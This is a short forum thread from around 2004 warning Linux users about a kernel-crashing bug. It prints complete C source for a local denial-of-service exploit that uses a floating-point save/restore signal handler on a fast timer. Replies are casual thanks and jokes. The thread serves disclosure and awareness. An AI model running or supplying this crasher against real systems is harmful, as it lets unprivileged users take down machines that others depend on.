Linux Kernal crasher

Something for all you Linux users to be aware of.

http://linuxreviews.org/news/2004-06...ndex.html#toc1

Don't compile this on a linux box and run it, even as an underprivileged user:

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);

return 0;
}

Re: Linux Kernal crasher

Thanks for the tip :)

I'd seen an announcement of this bug somewhere else the other day but hadn't seen the code or details about it yet.

Guess there is a good thing about having my main system still running 2.2.x

Steve.

Re: Linux Kernal crasher

I am running 2.6.0 and every few days the kernel just crashes, the system hangs and a reboot is needed. lucky i just converted all the filesystems to ext3, makes the fs check quicker. i have seen this the other day but never read it. hopefully it solves the probs i am having...

ROFL @ this tidbit of advice:

If your system is a production server with 1000 on line users then do not test this code on that box.
But muuum, I wanna try it...
